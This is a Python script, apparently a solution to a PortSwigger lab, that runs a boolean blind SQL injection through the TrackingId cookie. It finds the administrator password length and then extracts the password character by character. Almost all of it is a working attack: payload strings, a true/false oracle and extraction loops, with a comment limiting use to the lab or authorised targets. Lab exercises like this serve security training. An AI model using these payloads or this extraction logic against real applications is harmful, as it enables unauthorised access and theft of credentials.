Blind SQL injection with conditional responses
#!/usr/bin/python3 | |
# Lab: https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses
# Boolean-based blind SQL injection through the TrackingId cookie: first find the
# administrator's password length, then recover the password one character at a time
# by asking the page a yes/no question ("Welcome back" present or not) per request.
# Intended only for the PortSwigger lab instance or a target you are authorised to test.
import requests,string | |
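url = 'https://0a7a006b04e00d86c087908900db009f.web-security-academy.net'

# Substring the lab page contains only when the injected condition is true;
# its presence/absence is the single bit of information each request leaks.
TRUE_MARKER = "Welcome back"
# Exclusive upper bound for the length probe (the original looped range(1, 30)).
MAX_PASSWORD_LENGTH = 30
# Candidate alphabet, tried in this order. A password character outside this
# set cannot be recovered; extract_password reports such a position as '?'.
characters = list(string.ascii_lowercase) + list(string.digits)

# Boolean-oracle payloads appended to the legitimate TrackingId cookie value.
# NOTE(review): both payloads end in "'a;" / "'%s;" rather than "'a" / "'%s",
# so the trailing ';' lands inside the closing string literal of the lab's
# query. Kept byte-for-byte from the original; if the oracle never answers
# true, dropping the ';' is the first thing to try.
LENGTH_PAYLOAD = "' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)=%s)='a;"
CHAR_PAYLOAD = "' AND (SELECT SUBSTRING(password,%s,1) FROM users WHERE username='administrator') ='%s;"


def make_oracle(base_url, tracking_id, timeout=10.0):
    """Build the boolean oracle used by the length and character probes.

    Each call sends ``tracking_id + payload`` as the TrackingId cookie in a
    fresh, session-less GET (exactly as the original loops did, so no second
    TrackingId from a session jar is sent alongside it) and reports whether
    TRUE_MARKER appeared in the response body.

    Args:
        base_url: Lab base URL.
        tracking_id: The legitimate TrackingId value issued by the lab.
        timeout: Per-request timeout in seconds; without one a stalled lab
            instance hangs the whole extraction indefinitely.

    Returns:
        A callable ``ask(payload) -> bool``.

    Raises:
        requests.RequestException: propagated from the underlying GET.
    """
    def ask(payload):
        cookies = {'TrackingId': tracking_id + payload}
        response = requests.get(base_url, cookies=cookies, timeout=timeout)
        return TRUE_MARKER in response.text
    return ask


def find_password_length(ask, max_length=MAX_PASSWORD_LENGTH):
    """Probe ``LENGTH(password) = n`` for n in 1 .. max_length-1.

    Args:
        ask: Oracle from make_oracle (payload -> bool).
        max_length: Exclusive upper bound on the lengths tried.

    Returns:
        The first n the oracle confirms, or None when no length in range
        matches (the original kept looping silently and printed nothing).
        Stops at the first hit instead of issuing the remaining useless requests.
    """
    for n in range(1, max_length):
        if ask(LENGTH_PAYLOAD % (n,)):
            return n
    return None


def extract_password(ask, length, alphabet=None):
    """Recover ``length`` password characters, one position per inner loop.

    For each position the candidates are tried in order and the first one the
    oracle confirms is appended; the remaining candidates are skipped (the
    original tried all of them, roughly doubling the request count). A
    position no candidate matches is recorded as '?' and reported, so later
    characters stay aligned instead of silently shifting left.

    Args:
        ask: Oracle from make_oracle (payload -> bool).
        length: Password length as reported by find_password_length.
        alphabet: Candidate characters; defaults to ``characters``.

    Returns:
        The recovered password; always exactly ``length`` characters.
    """
    if alphabet is None:
        alphabet = characters
    recovered = []
    for position in range(1, length + 1):
        for char in alphabet:
            if ask(CHAR_PAYLOAD % (position, char)):
                print("digit found: %s" % (char))
                recovered.append(char)
                break
        else:
            # Character is outside the alphabet (or the oracle misfired);
            # keep the slot so the final output is not misaligned.
            print("no candidate matched position %s; character is outside the alphabet" % (position))
            recovered.append('?')
    return ''.join(recovered)


def main():
    """Fetch a TrackingId, find the administrator password length, then dump it."""
    first = requests.get(url, timeout=10.0)
    tcookie = first.cookies.get("TrackingId")
    if tcookie is None:
        raise SystemExit("no TrackingId cookie in the lab response; check the lab URL")
    ask = make_oracle(url, tcookie)
    length = find_password_length(ask)
    if length is None:
        raise SystemExit("length probe never answered true; the lab may have expired or the payload needs adjusting")
    print("The password length is %s" % (length))
    password = extract_password(ask, length)
    print("Administrator password is: " + password)


if __name__ == "__main__":
    main()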